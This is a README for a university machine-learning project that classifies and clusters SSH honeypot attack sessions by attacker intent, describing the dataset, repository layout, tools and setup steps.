Table of Contents
• Overview
• Dataset
• Project Report
• Project Structure
• Tools and Technologies
• How to Run the Project
• Detailed Documentation
• Data Directory
• Notebooks Directory
• Results Directory
• Scripts Directory
• Tests Directory
• Authors
• License
• Acknowledgments
This project is part of the Machine Learning for Networking course at Politecnico di Torino. It focuses on analyzing SSH shell attack sessions recorded from honeypot deployments to classify attacker intents and explore underlying patterns.
- Original Project Repository: ML4Net/SSH-Shell-Attacks
- Original Report Repository: ML4Net/latex-report
Navigation Tip: This
README
provides a general overview of the project. For detailed documentation, check the specificREADME
files in each directory (see Table of Contents above). Each subdirectory contains in-depth information about its specific components.
Quick Links:
- For data structure and preprocessing: Data Documentation
- For analysis notebooks: Notebooks Documentation
- For implementation details: Scripts Documentation
- Classification: Automatically identify and assign attacker intents (e.g.,
Persistence
,Discovery
) to each SSH attack session. - Clustering: Group similar attack sessions to uncover attack patterns and fine-grained categories.
- Language Models: Explore advanced NLP techniques like BERT and Doc2Vec for improved classification performance.
The dataset consists of approximately 230,000 Unix shell attack sessions recorded from honeypots. It includes:
- Session Commands: Malicious commands executed in an SSH session.
- Timestamps: The exact time each attack started.
- Labels: Pre-assigned intents based on the MITRE ATT&CK framework.
The dataset uses 7 main intent classes:
- Persistence
- Discovery
- Defense Evasion
- Execution
- Impact
- Other (Miscellaneous intents)
- Harmless (Non-malicious commands)
The project report is a comprehensive document detailing the methodologies, experiments, and findings of the SSH Shell Attacks project.
- Format: PDF
- Template: ACM format single column (acmlarge)
The report is named SSH-Shell-Attacks-report.pdf and can be found in the root directory of the repository.
There is also an appendix of the project that contains extra plots and additional information. The appendix is also in the root directory, in PDF format, and uses the same ACM format single column template. The appendix is named SSH-Shell-Attacks-appendix.pdf.
The original source code of the report can be found in the repo latex-report.
SSH-Shell-Attacks/
│
├── data/ # Dataset and related resources
│ ├── raw/ # Original dataset files (e.g., ssh_attacks.parquet)
│ └── processed/ # Pre-processed and feature-engineered files
│
├── notebooks/ # Jupyter notebooks
│
├── scripts/ # Python scripts for algorithms and utilities
│
├── results/ # Outputs from the models and analysis
│ ├── figures/ # Plots and visualizations
│ ├── models/ # Saved models (e.g., .pkl, .h5)
│ └── metrics/ # Evaluation metrics and reports
│
├── README.md # High-level overview of the project
├── SSH-Shell-Attacks-report.pdf # Report of the project
├── SSH-Shell-Attacks-appendix.pdf # Appendix of the report
├── requirements.txt # Python dependencies
├── .gitignore # Ignore unnecessary files for versioning
└── LICENSE # Licensing information (optional)
- Programming Language: Python
- Libraries:
- Data Processing:
pandas
,numpy
,pyarrow
- Visualization:
matplotlib
,seaborn
- Machine Learning:
scikit-learn
- Clustering:
scikit-learn
,wordcloud
- Language Models:
scikit-learn
,transformers
,torch
- Data Processing:
-
Clone the Repository:
git clone https://github.com/ML4Net/SSH-Shell-Attacks.git cd SSH-Shell-Attacks
-
Install Dependencies:
pip install -r requirements.txt
-
Execute the Notebooks: Open the relevant notebook for each section and follow the instructions to:
- Load the dataset.
- Perform data exploration.
- Train and evaluate machine learning models.
Notebooks:
section0_data_preprocessing_and_cleaning.ipynb
section1_data_exploration_and_preprocessing.ipynb
section2_supervised_learning_classification.ipynb
section3_unsupervised_learning_clustering.ipynb
section4_language_model_exploration.ipynb
-
Explore Scripts: Run modular scripts in the
scripts/
directory for specific tasks like preprocessing or model training.
Name | GitHub | ||
---|---|---|---|
Andrea Botticella | |||
Elia Innocenti | |||
Renato Mignone | |||
Simone Romano |
This project is licensed under the MIT License - see the LICENSE file for details.
- Luca Vassio ([email protected]): the professor supervising our work and the primary point of reference for the project.
- Matteo Boffa ([email protected]): the creator and organizer of this project.
- Team Members: Andrea Botticella, Elia Innocenti, Renato Mignone, and Simone Romano.
Please cite us if this project is copied, used for inspiration, or if any material is taken from it.